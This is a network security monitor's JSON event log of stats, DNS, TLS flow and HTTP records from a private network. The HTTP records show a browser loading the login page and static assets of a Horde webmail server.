{"timestamp":"2020-02-29T00:24:34.002570+0000","event_type":"stats","stats":{"uptime":15126,"capture":{"kernel_packets":140362,"kernel_drops":0},"decoder":{"pkts":140368,"bytes":96376832,"invalid":195,"ipv4":138787,"ipv6":10,"ethernet":140368,"raw":0,"null":0,"sll":0,"tcp":133233,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088992},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2883,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2899,"synack":2890,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":779,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2869,"new_pruned":17,"est_pruned":2518,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":13875,"memcap_state":0,"memcap_global":0},"http":{"memuse":80,"memcap":0}}} 
{"timestamp":"2020-02-29T00:24:42.000226+0000","event_type":"stats","stats":{"uptime":15134,"capture":{"kernel_packets":140362,"kernel_drops":0},"decoder":{"pkts":140368,"bytes":96376832,"invalid":195,"ipv4":138787,"ipv6":10,"ethernet":140368,"raw":0,"null":0,"sll":0,"tcp":133233,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088992},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2883,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2899,"synack":2890,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":779,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2869,"new_pruned":17,"est_pruned":2518,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":13875,"memcap_state":0,"memcap_global":0},"http":{"memuse":80,"memcap":0}}} 
{"timestamp":"2020-02-29T00:24:47.000550+0000","flow_id":206771237029553,"event_type":"flow","src_ip":"192.168.10.122","src_port":39566,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:46.460465+0000","end":"2020-02-29T00:19:46.569640+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:47.000963+0000","flow_id":2245338809397529,"event_type":"flow","src_ip":"192.168.10.122","src_port":51086,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":172,"bytes_toclient":282,"start":"2020-02-29T00:19:46.684313+0000","end":"2020-02-29T00:19:46.910017+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:48.001081+0000","flow_id":302055086514181,"event_type":"flow","src_ip":"192.168.10.122","src_port":54089,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":172,"bytes_toclient":282,"start":"2020-02-29T00:19:46.942085+0000","end":"2020-02-29T00:19:47.309545+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:48.328496+0000","flow_id":404301097748814,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53108,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2067}} 
{"timestamp":"2020-02-29T00:24:48.420446+0000","flow_id":404301097748814,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53108,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2067},"app_proto":"http","fileinfo":{"filename":"\/login.php","state":"CLOSED","stored":false,"size":5873,"tx_id":0}} {"timestamp":"2020-02-29T00:24:48.424060+0000","flow_id":2058924363639521,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53110,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/mozilla.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":141}} {"timestamp":"2020-02-29T00:24:48.425400+0000","flow_id":2058924363639521,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53110,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/mozilla.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":141},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/mozilla.css","state":"CLOSED","stored":false,"size":173,"tx_id":0}} 
{"timestamp":"2020-02-29T00:24:48.428962+0000","flow_id":2226118850538449,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53114,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/horde.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2236}} {"timestamp":"2020-02-29T00:24:48.430576+0000","flow_id":2058924363639521,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53110,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/accesskeys.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1005}} {"timestamp":"2020-02-29T00:24:48.432132+0000","flow_id":1027445017833512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53118,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/login.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":280}} 
{"timestamp":"2020-02-29T00:24:48.432491+0000","flow_id":2058924363639521,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53110,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/accesskeys.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1005},"app_proto":"http","fileinfo":{"filename":"\/js\/accesskeys.js","state":"CLOSED","stored":false,"size":2729,"tx_id":1}} {"timestamp":"2020-02-29T00:24:48.432746+0000","flow_id":2058924363639521,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53110,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/horde-power1.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2258}} {"timestamp":"2020-02-29T00:24:48.429717+0000","flow_id":404301097748814,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53108,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":9246}} 
{"timestamp":"2020-02-29T00:24:48.430661+0000","flow_id":1391374776691898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53116,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/login.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1118}} {"timestamp":"2020-02-29T00:24:48.448591+0000","flow_id":25411967806218,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53112,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prototype.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31816},"app_proto":"http","fileinfo":{"filename":"\/js\/prototype.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:24:48.450066+0000","flow_id":25411967806218,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53112,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/prototype.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":46054}} 
{"timestamp":"2020-02-29T00:24:48.513328+0000","flow_id":25411967806218,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53112,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-default.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:24:48.575865+0000","flow_id":25411967806218,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53112,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-default.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-default.png","state":"CLOSED","stored":false,"size":87,"tx_id":1}} {"timestamp":"2020-02-29T00:24:48.576235+0000","flow_id":25411967806218,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53112,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":918}} 
{"timestamp":"2020-02-29T00:24:49.000298+0000","event_type":"stats","stats":{"uptime":15141,"capture":{"kernel_packets":140362,"kernel_drops":0},"decoder":{"pkts":140368,"bytes":96376832,"invalid":195,"ipv4":138787,"ipv6":10,"ethernet":140368,"raw":0,"null":0,"sll":0,"tcp":133233,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088416},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2883,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2899,"synack":2890,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":779,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2869,"new_pruned":17,"est_pruned":2520,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":1,"flows_timeout":4,"flows_timeout_inuse":2,"flows_removed":2,"rows_checked":65536,"rows_skipped":65531,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":12884,"memcap_state":0,"memcap_global":0},"http":{"memuse":259172,"memcap":0}}} 
{"timestamp":"2020-02-29T00:24:49.001045+0000","flow_id":2154259743701700,"event_type":"flow","src_ip":"192.168.10.130","src_port":34274,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":39,"pkts_toclient":66,"bytes_toserver":5625,"bytes_toclient":81171,"start":"2020-02-29T00:22:30.916164+0000","end":"2020-02-29T00:22:36.258283+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:49.001535+0000","flow_id":1798765300213308,"event_type":"flow","src_ip":"192.168.10.130","src_port":34272,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":37,"pkts_toclient":73,"bytes_toserver":4670,"bytes_toclient":95925,"start":"2020-02-29T00:22:24.976444+0000","end":"2020-02-29T00:22:30.123349+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:50.000647+0000","flow_id":1638833592828724,"event_type":"flow","src_ip":"192.168.10.122","src_port":48417,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:49.688948+0000","end":"2020-02-29T00:19:49.800136+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:24:51.000340+0000","flow_id":1012257993948441,"event_type":"flow","src_ip":"192.168.10.122","src_port":39263,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:50.490777+0000","end":"2020-02-29T00:19:50.601928+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:51.001295+0000","flow_id":545992049333857,"event_type":"flow","src_ip":"192.168.10.122","src_port":59343,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:50.628321+0000","end":"2020-02-29T00:19:50.736476+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:51.001598+0000","flow_id":559357987575908,"event_type":"flow","src_ip":"192.168.10.122","src_port":54554,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:50.252004+0000","end":"2020-02-29T00:19:50.360299+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:53.433983+0000","flow_id":2226118850538449,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53114,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/horde.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2236},"app_proto":"http","fileinfo":{"filename":"\/js\/horde.js","state":"CLOSED","stored":false,"size":6422,"tx_id":0}} {"timestamp":"2020-02-29T00:24:53.434123+0000","flow_id":1027445017833512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53118,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/login.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":280},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/login.js","state":"CLOSED","stored":false,"size":415,"tx_id":0}} {"timestamp":"2020-02-29T00:24:53.434165+0000","flow_id":2058924363639521,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53110,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/horde-power1.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2258},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/horde-power1.png","state":"CLOSED","stored":false,"size":2258,"tx_id":2}} 
{"timestamp":"2020-02-29T00:24:53.434077+0000","flow_id":1391374776691898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53116,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/login.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1118},"app_proto":"http","fileinfo":{"filename":"\/js\/login.js","state":"CLOSED","stored":false,"size":3062,"tx_id":0}} {"timestamp":"2020-02-29T00:24:53.434898+0000","flow_id":404301097748814,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53108,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":9246},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":48239,"tx_id":1}} {"timestamp":"2020-02-29T00:24:53.581143+0000","flow_id":25411967806218,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53112,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":918},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":918,"tx_id":2}} {"timestamp":"2020-02-29T00:24:54.000497+0000","flow_id":1486409513894428,"event_type":"flow","src_ip":"192.168.10.130","src_port":34280,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":32,"pkts_toclient":64,"bytes_toserver":3501,"bytes_toclient":80837,"start":"2020-02-29T00:23:45.393756+0000","end":"2020-02-29T00:23:50.437750+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:54.000728+0000","flow_id":231209601455855,"event_type":"flow","src_ip":"192.168.10.122","src_port":33684,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:53.120559+0000","end":"2020-02-29T00:19:53.229605+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:55.000492+0000","flow_id":2148994103536245,"event_type":"flow","src_ip":"192.168.10.122","src_port":50516,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:19:54.289397+0000","end":"2020-02-29T00:19:54.400745+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:24:56.000214+0000","event_type":"stats","stats":{"uptime":15148,"capture":{"kernel_packets":140517,"kernel_drops":0},"decoder":{"pkts":140526,"bytes":96460879,"invalid":195,"ipv4":138945,"ipv6":10,"ethernet":140526,"raw":0,"null":0,"sll":0,"tcp":133391,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7087552},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2889,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2905,"synack":2896,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1904,"ftp":0,"smtp":0,"tls":779,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4922,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2871,"new_pruned":17,"est_pruned":2525,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":1,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10899,"memcap_state":0,"memcap_global":0},"http":{"memuse":560,"memcap":0}}} 
{"timestamp":"2020-02-29T00:24:56.288577+0000","flow_id":1196688204654401,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60959,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":52541,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:24:56.397551+0000","flow_id":1196688204654401,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60959,"proto":"UDP","dns":{"type":"answer","id":52541,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:24:56.397551+0000","flow_id":1196688204654401,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60959,"proto":"UDP","dns":{"type":"answer","id":52541,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 